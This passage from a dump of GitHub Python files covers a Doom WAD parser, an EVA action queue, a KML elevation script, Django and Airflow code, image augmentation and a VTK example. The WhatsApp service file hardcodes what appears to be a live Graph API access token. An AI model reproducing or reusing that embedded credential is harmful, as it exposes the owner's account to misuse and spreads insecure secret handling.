directory:\n wad.f.seek(entry.filepos)\n lumpend = wad.f.tell() + entry.size\n name = entry.name\n\n if wad.is_map_start_lump(name):\n assert entry.size == 0, name\n print('reading map ' + entry.name)\n mapp = Map(entry.name)\n s.maps += [mapp]\n\n elif mapp and mapp.handle_lump(wad, entry, lumpend):\n # no need to do anything - it handled it\n pass\n \n elif name == 'ENDOOM':\n # sanity check\n assert entry.size == 4000\n s.end_msg = wad.f.read(4000)\n\n else:\n # ignore this lump\n pass\n\ndef enum_map_names(path):\n \"\"\" This will yield (lumpinfo, wadfile) tuples for each lump \"\"\"\n with open(path, 'rb') as f:\n wad = WADFile(f)\n\n header = f.read(4).decode('ascii')\n num_lumps = wad.read_long()\n dir_offset = wad.read_long()\n\n assert header == 'IWAD' or header == 'PWAD', header\n\n # read directory\n f.seek(dir_offset)\n infosize = LumpInfo().get_size()\n end = f.tell() + num_lumps * infosize\n directory = wad.read_array_lump(end, LumpInfo)\n\n for entry in directory:\n if is_map_start_lump(entry.name):\n yield entry.name\n\ndef load(path):\n \"\"\" This will yield (lumpinfo, wadfile) tuples for each lump \"\"\"\n with open(path, 'rb') as f:\n wad = WADFile(f)\n\n header = f.read(4).decode('ascii')\n num_lumps = wad.read_long()\n dir_offset = wad.read_long()\n\n assert header == 'IWAD' or header == 'PWAD', header\n\n # read directory\n f.seek(dir_offset)\n infosize = LumpInfo().get_size()\n end = f.tell() + num_lumps * infosize\n directory = 
wad.read_array_lump(end, LumpInfo)\n\n # lumps\n rv = WADContent()\n rv.read_lumps( directory, wad )\n return rv\n\ndef save(path, header, lumps):\n with open(path, 'wb') as fout:\n \"\"\" Writes an array of lumps to a *single* WAD file, handling proper directory setup, etc. \"\"\"\n io = WADFile(fout)\n fout.write('PWAD'.encode('ascii'))\n io.write_long( len(lumps) )\n\n # dir offset\n total_lump_size = sum([ lump.get_size() for lump in lumps])\n dir_offset = 4 + 4 + 4 + total_lump_size\n io.write_long( dir_offset )\n\n # write lumps while bookeeping\n lumpstart = 4 + 4 + 4\n directory = []\n\n print('dir off set = %d' % dir_offset)\n\n for lump in lumps:\n # print('start = %d, tell = %d' % (lumpstart, fout.tell()))\n assert lumpstart == fout.tell()\n lump.write(io)\n\n # create dir entry\n entry = LumpInfo()\n entry.clear()\n entry.name = lump.get_name()\n entry.size = lump.get_size()\n entry.filepos = lumpstart\n\n directory += [entry]\n print('%d += %d' % (lumpstart, entry.size))\n lumpstart += entry.size\n\n assert lumpstart == dir_offset\n io.write_array_lump(directory)\n\n\ndef save_map_png(mapp, fname):\n return save_map_png_partial( mapp, fname, 1.0 )\n\ndef save_map_png_partial(mapp, fname, linechance):\n w_inches = 10\n h_inches = 8\n pyplt.figure(figsize=(w_inches, h_inches))\n mapp.plot_partial(h_inches/w_inches, linechance)\n pyplt.savefig(fname, dpi=512)\n print('done plotting to %s' % fname)\n pyplt.close()\n\ndef test_dump_doom1_pngs():\n path = dero_config.DOOM1_WAD_PATH\n content = load(path)\n\n assert len(content.maps) == 36\n assert content.end_msg\n\n for i in range(len(content.maps)):\n save_map_png(content.maps[i], 'doom1-map-' + str(i) + '.png')\n\ndef test_doom1_wad():\n path = dero_config.DOOM1_WAD_PATH\n content = load(path)\n\n assert len(content.maps) == 36\n assert content.end_msg\n e1m1 = content.maps[0]\n\n # create square map\n m3 = create_square_map(e1m1)\n lumps = []\n m3.append_lumps_to(lumps)\n save('square.wad', 'PWAD', lumps)\n dero_config.build_wad( 'square.wad', 'square-built.wad' )\n\n # filter out all things except player start\n e1m1.things = [t for t in e1m1.things if t.type == 1]\n\n # make all floors use FLAT5_3\n for s in e1m1.sectors:\n s.floor_pic = 'FLAT5_3'\n\n # print out all unique LD functions\n funcs = set([ ld.function for ld in e1m1.linedefs] )\n print('unique functions: ' + str(funcs))\n\n # write the map back\n lumps = []\n e1m1.append_lumps_to(lumps)\n save('%s.wad' % e1m1.name, 'PWAD', lumps)\n\n # run bsp on it\n dero_config.build_wad( '%s.wad' % e1m1.name, f'{e1m1.name}-built.wad' )\n\n # read it back\n cont2 = load('%s.wad' % e1m1.name)\n assert len(cont2.maps) == 1\n assert cont2.end_msg == None\n _map2 = cont2.maps[0]\n assert _map2.name == e1m1.name\n assert len(_map2.verts) == len(e1m1.verts)\n assert len(_map2.linedefs) == len(e1m1.linedefs)\n assert len(_map2.things) == 1\n\n # draw maps for comparison\n save_map_png( e1m1, 'expected.png')\n save_map_png( _map2, 'actual.png')\n\ndef create_square_map(ref):\n\n L = 200\n rv = Map('E1M1')\n rv.add_player_start(L//2,L//2,0)\n rv.verts = [\n Vertex().fill([0,0]),\n Vertex().fill([0,L]),\n Vertex().fill([L,L]),\n Vertex().fill([L,0]),\n Vertex().fill([0,2*L]),\n Vertex().fill([L,2*L]),\n ]\n\n random.seed(42)\n\n valid_sec_ids = [sid for sid in range(len(ref.sectors)) if ref.sectors[sid].has_all_textures()]\n ref_sec_id = random.choice(valid_sec_ids)\n ref_sec_id2 = random.choice(valid_sec_ids)\n refsec = ref.sectors[ref_sec_id]\n refsec2 = ref.sectors[ref_sec_id2]\n\n 
rv.sectors = [\n Sector().fill([0, 100, refsec.floor_pic, refsec.ceil_pic, 200, 0, 0]),\n Sector().fill([16, 16, refsec2.floor_pic, refsec2.ceil_pic, 200, 0, 0]),\n ]\n\n exit_lds = [ld for ld in ref.linedefs if ld.function == 11]\n exit_sd = ref.sidedefs[ exit_lds[0].sd_right ]\n print('exit ld = ', exit_lds[0])\n print('exit sd = ', exit_sd)\n\n refsd = random.choice([sd for sd in ref.sidedefs if sd.has_all_textures()])\n refsd2 = random.choice([sd for sd in ref.sidedefs if sd.has_all_textures()])\n print('refsd', refsd)\n print('refsd2', refsd2)\n\n rv.sidedefs = [\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, refsd.midtex, 0]), # 0\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, refsd.midtex, 0]), # 1\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, refsd.midtex, 0]), # 2\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, '-', 0]), # 3\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, '-', 1]), # 4\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, refsd2.midtex, 1]), # 5\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, refsd2.midtex, 1]), # 6\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, refsd2.midtex, 1]), # 7\n ]\n\n \"\"\"\n 4 5\n\n 1 2\n\n 0 3\n \"\"\"\n\n rv.linedefs = [\n LineDef().fill([2, 3, 0, 0, 0, 0, -1]).set_flag('Impassible'),\n LineDef().fill([3, 0, 0, 0, 0, 1, -1]).set_flag('Impassible'),\n LineDef().fill([0, 1, 0, 0, 0, 2, -1]).set_flag('Impassible'),\n LineDef().fill([1, 2, 0, 31, 0, 3, 4]).set_flag('Impassible').clear_flag('Impassible').set_flag('Two-sided'),\n LineDef().fill([1, 4, 0, 0, 0, 5, -1]).set_flag('Impassible').set_flag('Lower Unpegged'),\n LineDef().fill([4, 5, 0, 0, 0, 6, -1]).set_flag('Impassible').set_flag('Lower Unpegged'),\n LineDef().fill([5, 2, 0, 0, 0, 7, -1]).set_flag('Impassible').set_flag('Lower Unpegged'),\n ]\n\n print('FOO')\n print(str(exit_sd))\n\n\n return rv\n\nif __name__ == \"__main__\":\n test_doom1_wad()\n # test_dump_doom1_pngs()\n","repo_name":"stevesan/dero","sub_path":"wad.py","file_name":"wad.py","file_ext":"py","file_size_in_byte":21108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31786081","text":"__author__ = \"Altertech Group, https://www.altertech.com/\"\n__copyright__ = \"Copyright (C) 2012-2021 Altertech Group\"\n__license__ = \"Apache License 2.0\"\n__version__ = \"3.4.2\"\n\nimport threading\nfrom queue import PriorityQueue\nimport logging\nimport eva.core\nimport eva.item\nimport time\nimport asyncio\n\nfrom neotasker import BackgroundIntervalWorker, BackgroundQueueWorker\n\n\nclass ActiveItemQueue(object):\n\n def __init__(self,\n queue_id,\n keep_history=None,\n default_priority=100,\n enterprise_layout=False):\n self.default_priority = default_priority\n self.q_id = queue_id\n self.keep_history = keep_history\n\n self.actions = []\n self.actions_by_id = {}\n self.actions_by_item_id = {}\n self.actions_by_item_full_id = {}\n\n self.actions_lock = threading.RLock()\n\n self.action_processor = None\n\n self.enterprise_layout = enterprise_layout\n\n self.action_cleaner = None\n self.action_processor = None\n\n def put_task(self, action, priority=None):\n if priority:\n p = priority\n else:\n p = self.default_priority\n if self.keep_history:\n self.history_append(action)\n if action.set_pending():\n self.action_processor.put_threadsafe(action)\n return True\n return False\n\n def serialize(self):\n d = []\n if not self.actions_lock.acquire(timeout=eva.core.config.timeout):\n 
logging.critical('ActiveItemQueue::serialize_action locking broken')\n eva.core.critical()\n return\n try:\n _actions = self.actions.copy()\n except:\n eva.core.log_traceback()\n finally:\n self.actions_lock.release()\n for a in _actions:\n d.append(a.serialize())\n return d\n\n def history_get(self, action_uuid):\n try:\n if action_uuid in self.actions_by_id:\n return self.actions_by_id[action_uuid]\n except:\n return None\n\n def history_append(self, action):\n if not self.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::history_append locking broken')\n eva.core.critical()\n return False\n try:\n self.actions.append(action)\n self.actions_by_id[action.uuid] = action\n if not self.enterprise_layout:\n self.actions_by_item_id.setdefault(action.item.item_id,\n []).append(action)\n self.actions_by_item_full_id.setdefault(action.item.full_id,\n []).append(action)\n return True\n except:\n eva.core.log_traceback()\n return False\n finally:\n self.actions_lock.release()\n\n def history_remove(self, action):\n if not self.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::history_remove locking broken')\n eva.core.critical()\n return False\n try:\n if not self.enterprise_layout:\n self.actions_by_item_id[action.item.item_id].remove(action)\n self.actions_by_item_full_id[action.item.full_id].remove(action)\n self.actions.remove(action)\n del self.actions_by_id[action.uuid]\n return True\n except:\n eva.core.log_traceback()\n return False\n finally:\n self.actions_lock.release()\n\n def start(self):\n if self.keep_history is None:\n self.keep_history = eva.core.config.keep_action_history\n self.action_cleaner_interval = eva.core.config.action_cleaner_interval\n\n self.action_cleaner = BackgroundIntervalWorker(\n fn=action_cleaner,\n name='primary_action_cleaner',\n delay=self.action_cleaner_interval,\n o=self,\n on_error=eva.core.log_traceback,\n loop='cleaners')\n self.action_cleaner.start()\n self.action_processor = BackgroundQueueWorker(\n fn=action_processor,\n name='primary_action_processor',\n on_error=eva.core.log_traceback,\n queue=asyncio.queues.PriorityQueue,\n o=self)\n self.action_processor.start()\n\n def stop(self):\n self.action_cleaner.stop()\n self.action_processor.stop()\n\n def process_action(self, action):\n return action.item.q_put_task(action)\n\n\nasync def action_processor(action, **kwargs):\n if not action.item:\n return\n o = kwargs.get('o')\n logging.debug('new action to toss, uuid: %s, priority: %u' % \\\n (action.uuid, action.priority))\n try:\n if o.process_action(action):\n logging.debug(\n 'action %s requeued into local queue of %s' % \\\n (action.uuid, action.item.full_id))\n else:\n logging.debug(\n 'action %s failed to requeue into local queue of %s' %\\\n (action.uuid, action.item.full_id))\n except:\n eva.core.log_traceback()\n\n\nasync def action_cleaner(**kwargs):\n o = kwargs.get('o')\n if not o.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::_t_action_cleanup locking broken')\n eva.core.critical()\n return\n logging.debug('cleaning old actions')\n try:\n _actions = o.actions.copy()\n except:\n _actions = []\n eva.core.log_traceback()\n finally:\n o.actions_lock.release()\n for a in _actions:\n try:\n tk = list(a.time.keys()).copy()\n except:\n eva.core.log_traceback()\n maxtime = 0\n for t in tk:\n try:\n maxtime = max(maxtime, a.time[t])\n except:\n pass\n if maxtime and maxtime < time.time() - o.keep_history:\n if 
a.is_finished():\n logging.debug(\n '%s action %s too old, removing' % \\\n (o.q_id, a.uuid))\n o.history_remove(a)\n else:\n logging.warning(\n '%s action %s too old, status is %s ' % \\\n (o.q_id, a.uuid,\n eva.item.ia_status_names[a.status]))\n","repo_name":"alttch/eva3","sub_path":"lib/eva/itemqueue.py","file_name":"itemqueue.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"44"} +{"seq_id":"21879524913","text":"import osr, os, affine, time\nfrom gdalconst import *\nfrom osgeo import gdal\n\ndef path_join(str):\n py_path = os.path.dirname(os.path.realpath(__file__))\n abs_path = os.path.join(py_path,str) \n if os.path.isfile(abs_path):\n return abs_path \n else:\n print('[Alarm] File not exist:{}\\n'.format(abs_path ))\n return abs_path \n\n\ndef retrieve_pixel_value(geo_coord, data_source):\n \"\"\"Return floating-point value that corresponds to given point.\"\"\"\n x, y = geo_coord[0], geo_coord[1]\n forward_transform = affine.Affine.from_gdal(*data_source.GetGeoTransform())\n reverse_transform = ~forward_transform\n px, py = reverse_transform * (x, y)\n px, py = int(px + 0.5), int(py + 0.5)\n pixel_coord = px, py\n data_array = np.array(data_source.GetRasterBand(1).ReadAsArray())\n # i = data_array[0]\n # j = data_array[1]\n return(data_array[pixel_coord[1]][pixel_coord[0]])\n\n \n# retuen lon list and lat list from kml file\ndef get_lon_lat(file_in, file_out, data):\n kml = [] \n with open(file_in, 'r', encoding='utf8') as origin:\n with open(file_out, 'w', encoding='utf8') as out:\n num = 0\n for line in origin.readlines(): \n if num == 1 :\n out.write('\\t\\t\\t\\t\\t\\t\\t')\n for j in line.split():\n if j != '':\n xlon = float(j.split(',')[0])\n xlat = float(j.split(',')[1])\n print(xlon, xlat)\n h = str(retrieve_pixel_value((xlon, xlat), data)+0.7) \n out.write(j.split(',')[0] + ',' + j.split(',')[1] + ',' + h + ' ') \n kml.append(j.split(',')[0] + ',' + j.split(',')[1] + ',' + h + '\\n')\n out.write('')\n num = 0\n else: \n out.write(line) \n \n if line.find('') > 0:\n num = 1\n print('[OK] write kml.\\n')\n return kml\n\ndef pixelcoord(x, y):\n \"\"\"Returns coordinates X Y from pixel\"\"\"\n xp = a * x + b * y + minX\n yp = d * x + e * y + minY\n return xp, yp\n\ndef print_dem_value(file):\n data = gdal.Open(file, GA_ReadOnly)\n raster = data.GetRasterBand(1)\n width = data.RasterXSize\n height = data.RasterYSize\n gt = data.GetGeoTransform()\n minX = gt[0]\n minY = gt[3] + width*gt[4] + height*gt[5] \n maxX = gt[0] + width*gt[1] + height*gt[2]\n maxY = gt[3] \n\n # print (\"the domain :\" , \"[\" ,minX,\";\",maxX,\"]\",\"[\", minY,\";\",maxY ,\"]\")\n\n # showing a 2D image of the topo\n # plt.imshow(data, cmap='gist_earth',extent=[minx, maxx, miny, maxy])\n # plt.show()\n\n # elevation 2D numpy array\n elevation = raster.ReadAsArray()\n\n a = gt[1]\n b = gt[2]\n d = gt[4]\n e = gt[5] \n \n for i in range(height):\n for j in range(width):\n xp = a * i + b * j + minX\n yp = d * i + e * j + minY\n if elevation[i][j] != -32767:\n print(xp , yp, elevation[i][j])\n\ndef write_it(file, list):\n with open(file, 'w') as f:\n for line in list: \n f.write(line)\n \n\ndef main(): \n start_time = time.time() \n # kml_file = path_join('t.kml')\n # kml_out = path_join('kml_add.kml')\n # dem_file = path_join('dem_410_wgs84.tif')\n # test_file = path_join('test.txt')\n \n f = r'C:\\Users\\RSLAB\\Desktop\\臺北市北投區行義段一小段506等\\20190314_臺北市北投區行義段一小段506、507、509、510、511、514地號等六筆土地宗祠新建工程水土保持計畫_wgs84.tif'\n k0 
= r'C:\\Users\\RSLAB\\Desktop\\臺北市北投區行義段一小段506等\\doc.kml'\n k1 = r'C:\\Users\\RSLAB\\Desktop\\臺北市北投區行義段一小段506等\\add_doc.kml'\n\n # print_dem_value(dem_file)\n data = gdal.Open(f, GA_ReadOnly)\n array = get_lon_lat(k0, k1, data)\n # write_it(test_file, array)\n \n \n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \nmain()","repo_name":"kkl918/Python-Tool","sub_path":"ori_kml_add_height.py","file_name":"ori_kml_add_height.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27215279887","text":"import requests\nimport json\n\ndef SendMessageWhatsapp(data):\n try:\n token = \"EAAUQM1QonnkBO5mIZB6fuJxBtgkBfFwIMjyZC24FY6MXR2aRCHDu5vIklr1Hz0moEeBZAcGDySBeUL2duPDIoRNYtXzi8reXpRymj4u0KjLsEhxPBFu2ufOIo3XnvKvxmvgvpyzJSHU5s2dTCuV8bHkhQNlgShEk6LOzZA5dlsVp3heRLTGGD7m10SYsgWDizdk7yPWJt2dzPZBobAiP9\"\n api_url = \"https://graph.facebook.com/v17.0/114784988391901/messages\"\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + token}\n response = requests.post(api_url, data = json.dumps(data), headers = headers)\n if response.status_code == 200:\n return True\n \n return False\n except Exception as exception:\n print(exception)\n return False","repo_name":"Fran1239/FazChatBot","sub_path":"whatsappservice.py","file_name":"whatsappservice.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33481984410","text":"class Package:\n def __init__(self, id, address, city, state, zipcode, deadline, weight):\n self.id = id\n self.address = address\n self.city = city\n self.state = state\n self.zipcode = zipcode\n self.deadline = deadline\n self.weight = weight\n\n def __str__(self):\n return \"%s, %s, %s, %s, %s, %s, %s\" % (self.id, self.address, self.city, self.state, self.zipcode, self.deadline, self.weight)\n","repo_name":"goldenaj/Andrew_Golden_C950_PA","sub_path":"Package.py","file_name":"Package.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22181170759","text":"import Augmentor\r\n\r\n# 确定原始图像存储路径以及掩码文件路径\r\nJPEG = Augmentor.Pipeline(\"Bijie-landslide-dataset\\landslide\\image\")\r\nJPEG.ground_truth(\"Bijie-landslide-dataset\\landslide\\mask\")\r\n\r\n# 图像旋转:按照概率0.8执行,最大左旋角10,最大右旋角\r\nJPEG.rotate(probability=0.8,max_left_rotation=10,max_right_rotation=10)\r\n\r\n# 图像左右互换:按照概率0.5执行\r\nJPEG.flip_left_right(probability=0.5)\r\n\r\n# 图像放大缩小:按照概率0.8执行,面积为原始图像的0.8倍\r\nJPEG.zoom_random(probability=0.8,percentage_area=0.8)\r\nJPEG.zoom(probability=0.3,min_factor=1.1,max_factor=1.6)\r\n\r\n# 透视变形-垂直方向形变:magnitude 取(0,1),指的是形变程度\r\nJPEG.skew_tilt(probability=0.7,magnitude=1)\r\n\r\n# 透视形变-斜四角形变形变:magnitude 取(0,1),指的是形变程度\r\nJPEG.skew_corner(probability=0.7,magnitude=1)\r\n\r\n# 弹性扭曲,类似区域扭曲的感觉\r\nJPEG.random_distortion(probability=1,grid_height=5,grid_width=16,magnitude=8)\r\n\r\n# 错位变化\r\nJPEG.shear(probability=1,max_shear_left=15,max_shear_right=15)\r\n\r\n# 随即区域擦除\r\nJPEG.random_erasing(probability=1,rectangle_area=0.5)\r\n\r\n# # 亮度\r\n# JPEG.random_brightness(probability=0.5,min_factor=0.3,max_factor=1.2)\r\n\r\n# 颜色\r\nJPEG.random_color(probability=1,min_factor=0,max_factor=1)\r\n\r\n# # 对比度\r\n# JPEG.random_contrast(probability=1,min_factor=0.7,max_factor=1.2)\r\n\r\n# 
最终扩充的数据样本\r\nJPEG.sample(20)\r\nJPEG.process()\r\n","repo_name":"fxd98/other-PY","sub_path":"data_augment/Augmentor汇总.py","file_name":"Augmentor汇总.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73709486533","text":"from matches.models import (Outcome, MatchDayMetadata)\nfrom django.db.models import Count\nfrom teams.services.domain import (\n TeamRepresentation, init_team, NameToTeamStats, IdToTeamStats)\nfrom django.core.cache import cache\nfrom typing import List\n\nNAME_TO_TEAM_STATS = 'name_to_team_stats'\nID_TO_TEAM_STATS = 'id_to_team_stats'\nLEADERBOARD = 'leaderboard'\nCURRENT_MATCHDAY = 'current_matchday'\n\n# ---------------- Public API ----------------\n\n\ndef get_leaderboard() -> List[TeamRepresentation]:\n \"\"\"\n Returns a sorted list of all teams by points.\n \"\"\"\n return get_cached_value('leaderboard')\n\n\ndef get_teams_by_name_similarity(name: str) -> List[TeamRepresentation]:\n team_stats = get_cached_value(NAME_TO_TEAM_STATS)\n similar = {team_name: team_representation\n for team_name, team_representation\n in team_stats.items()\n if name in team_name}\n return calculate_leaderboard(similar)\n\n\ndef get_team(team_id: int) -> TeamRepresentation:\n team_stats = get_cached_value(ID_TO_TEAM_STATS)\n return team_stats[team_id]\n\n\ndef get_cached_value(key: str):\n value = cache.get(key)\n if value is None:\n cache_contents = reload_cache()\n return cache_contents[key]\n\n return value\n\n\ndef reload_cache() -> dict:\n name_to_team_stats = build_name_to_team_stats(get_all_outcomes())\n leaderboard = calculate_leaderboard(name_to_team_stats)\n add_rank_to_team_stats(leaderboard)\n id_to_team_stats = build_id_to_team_stats(name_to_team_stats)\n cache_contents = {\n NAME_TO_TEAM_STATS: name_to_team_stats,\n ID_TO_TEAM_STATS: id_to_team_stats,\n LEADERBOARD: leaderboard,\n CURRENT_MATCHDAY: get_matchday_metadata()\n }\n\n cache.set_many(cache_contents, 300)\n\n return cache_contents\n# ---------------- Private Helpers ----------------\n\n\ndef get_all_outcomes():\n \"\"\"\n Returns an aggregate of the wins, losses and draws \n of each team in the database.\n \"\"\"\n return Outcome.objects.values(\n 'team__team_name',\n 'team_id',\n 'team__team_icon_url',\n 'outcome_type'\n ).annotate(outcome_type_count=Count('outcome_type'))\n\n\ndef build_name_to_team_stats(outcomes) -> NameToTeamStats:\n \"\"\"\n Builds structured classes out of a database aggregate and stores them\n in a team_name -> TeamRepresentation dictionary.\n \"\"\"\n team_performances: NameToTeamStats = {}\n for outcome in outcomes:\n team_name = outcome['team__team_name']\n team_icon_url = outcome['team__team_icon_url']\n team_performance = team_performances.get(\n team_name, init_team(outcome['team_id'], team_name, team_icon_url))\n setattr(team_performance,\n outcome['outcome_type'], outcome['outcome_type_count'])\n team_performances[team_name] = team_performance\n\n calculate_and_add_points(team_performances)\n\n return team_performances\n\n\ndef build_id_to_team_stats(stats: NameToTeamStats) -> IdToTeamStats:\n \"\"\"\n Builds a team_id -> TeamRepresentation dictionary from a\n team_name -> TeamRepresentation dictionary.\n \"\"\"\n id_to_representation_dict = {}\n for team_representation in stats.values():\n id_to_representation_dict[team_representation.id] = team_representation\n return id_to_representation_dict\n\n\ndef calculate_leaderboard(\n teams_stats: NameToTeamStats\n) -> 
List[TeamRepresentation]:\n \"\"\"\n Sorts teams by points.\n \"\"\"\n return sorted(\n teams_stats.values(),\n key=lambda tp: tp.points,\n reverse=True)\n\n\ndef calculate_and_add_points(team_performances: NameToTeamStats):\n \"\"\"\n Mutates each team representation by calculating the\n points based on the number of wins raws the team has.\n \"\"\"\n for team_name, team_performance in team_performances.items():\n points = team_performance.win * 3 + team_performance.draw\n team_performance.points = points\n\n\ndef add_rank_to_team_stats(leaderboard: List[TeamRepresentation]):\n \"\"\"\n Mutates each team representation by calculating the\n rank based on the order of the leaderboard.\n \"\"\"\n for i, team_representation in enumerate(leaderboard):\n team_representation.rank = i + 1\n\n\ndef get_matchday_metadata():\n return MatchDayMetadata.objects.order_by('-matchday')[0]\n","repo_name":"ZeppelinCode/football_stats_django","sub_path":"football_stats/teams/services/team_service.py","file_name":"team_service.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31992117322","text":"from django.db import models\nfrom core.models import TimeStampedModel, Extensions\nfrom django.contrib.auth import get_user_model\nfrom user_profile.models import Address\nfrom products.models import Product\n\n\nUserModel = get_user_model()\n\n\nclass Order(Extensions):\n PENDING_STATE = \"p\"\n COMPLETED_STATE = \"c\"\n\n ORDER_CHOICES = ((PENDING_STATE, \"pending\"), (COMPLETED_STATE, \"completed\"))\n\n buyer = models.ForeignKey(UserModel, related_name=\"order\", on_delete=models.CASCADE)\n order_number = models.CharField(max_length=250, blank=True, null=True)\n status = models.CharField(\n max_length=1, choices=ORDER_CHOICES, default=PENDING_STATE\n )\n is_paid = models.BooleanField(default=False)\n address = models.ForeignKey(\n Address, related_name=\"order_address\", on_delete=models.CASCADE\n )\n\n @staticmethod\n def create_order(buyer, order_number, address, is_paid=False):\n order = Order()\n order.buyer = buyer\n order.order_number = order_number\n order.address = address\n order.is_paid = is_paid\n order.save()\n return order\n\n\nclass OrderItem(TimeStampedModel):\n order = models.ForeignKey(\n Order, related_name=\"order_items\", on_delete=models.CASCADE\n )\n product = models.ForeignKey(\n Product, related_name=\"product_order\", on_delete=models.CASCADE\n )\n quantity = models.IntegerField()\n total = models.DecimalField(max_digits=10, decimal_places=2)\n\n @staticmethod\n def create_order_item(order, product, quantity, total):\n order_item = OrderItem()\n order_item.order = order\n order_item.product = product\n order_item.quantity = quantity\n order_item.total = total\n order_item.save()\n return order_item\n","repo_name":"thomas545/ecommerce_api","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"44"} +{"seq_id":"1779116016","text":"import logging\n\nfrom airflow.decorators import task\nfrom airflow.operators.python import get_current_context\n\nfrom influx.loaders.base_loader import BaseLoader\nfrom influx.utils.data_lakes.data_lake import DataLake\nfrom influx.utils.factory import Factory\n\n\n@task\ndef load(transform_key, prefix=None, params=None):\n\n context = get_current_context()\n\n logging.info(\n f\"Executing {context['task'].task_id} task \"\n 
f\"of DAG {context['dag'].dag_id} with run Id of {context['run_id']} \"\n f\"and logical date of {context['logical_date']}\"\n )\n\n loader = Factory.create_subclass(\n BaseLoader,\n prefix=prefix if prefix else context[\"dag\"].dag_id,\n **(params if params else context[\"params\"]),\n )\n\n logging.info(f\"{loader.__class__.__name__} created for {context['task'].task_id} task\")\n\n data_lake = DataLake()\n transform_values = data_lake.get(transform_key)\n loader.load(transform_values)\n\n logging.info(f\"{loader.__class__.__name__} has completed loading\")\n","repo_name":"petersmithca/garmin-airflow-influxdb","sub_path":"influx/tasks/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74256671492","text":"from django.urls import path\nfrom products import views\n\nurlpatterns = [\n path(\"\",views.product_list_create_view,name='product-list'),\n path(\"/\",views.product_detail_view,name='product-detail'),\n path(\"/update/\",views.ProductUpdateAPIView.as_view(),name='product-edit'),\n path(\"/delete/\",views.ProductDeleteAPIView.as_view()),\n path(\"product_m\",views.ProductMixinView.as_view()),\n path(\"product_m//\",views.ProductMixinView.as_view()),\n]\n","repo_name":"ankitbridgefix/freecode","sub_path":"backend/cfehome/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24200790387","text":"\n\"\"\"\nExample of plotting ellipsoids (useful for visualising tensors) with pyvisi \n\"\"\"\n\nimport vtk\n\n# reverse the order of the colourmap (looks better)\nlut = vtk.vtkLookupTable()\nrefLut = vtk.vtkLookupTable()\nlut.Build()\nrefLut.Build()\nfor i in range(256):\n lut.SetTableValue(i, refLut.GetTableValue(255-i))\n\n# set up the renderer\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\nrenWin.SetSize(640,480)\nren.SetBackground(1,1,1) # white\n\n# load a vtk file as input\nreader = vtk.vtkXMLUnstructuredGridReader()\nreader.SetFileName(\"stress22.vtk\")\nreader.Update()\n\n# grab the grid of the data\ngrid = reader.GetOutput()\n\n# convert the cell data to point data\nc2p = vtk.vtkCellDataToPointData()\nc2p.SetInput(grid)\n\n# now extract the tensor components\nextract = vtk.vtkExtractTensorComponents()\nextract.SetInput(c2p.GetOutput())\nextract.SetScalarModeToEffectiveStress()\nextract.ExtractScalarsOn()\nextract.PassTensorsToOutputOn()\nextract.ScalarIsEffectiveStress()\n\nextractGrid = extract.GetOutput()\nextractGrid.Update()\nextractScalarRange = extractGrid.GetPointData().GetScalars().GetRange()\n\n# make a sphere source for the glyphs\nsphere = vtk.vtkSphereSource()\nsphere.SetThetaResolution(6)\nsphere.SetPhiResolution(6)\nsphere.SetRadius(0.5)\n\n# make tensor glyphs\nglyph = vtk.vtkTensorGlyph()\nglyph.SetSource(sphere.GetOutput())\nglyph.SetInput(extractGrid)\nglyph.SetColorModeToScalars()\nglyph.ScalingOn()\nglyph.SetMaxScaleFactor(5.0)\nglyph.SetScaleFactor(1.0)\nglyph.ClampScalingOn()\n\n# make a stripper for faster rendering\nstripper = vtk.vtkStripper()\nstripper.SetInput(glyph.GetOutput())\n\n# make the normals of the data\nnormals = vtk.vtkPolyDataNormals()\nnormals.SetInput(stripper.GetOutput())\n\n# make the mapper for the data\nmapper = 
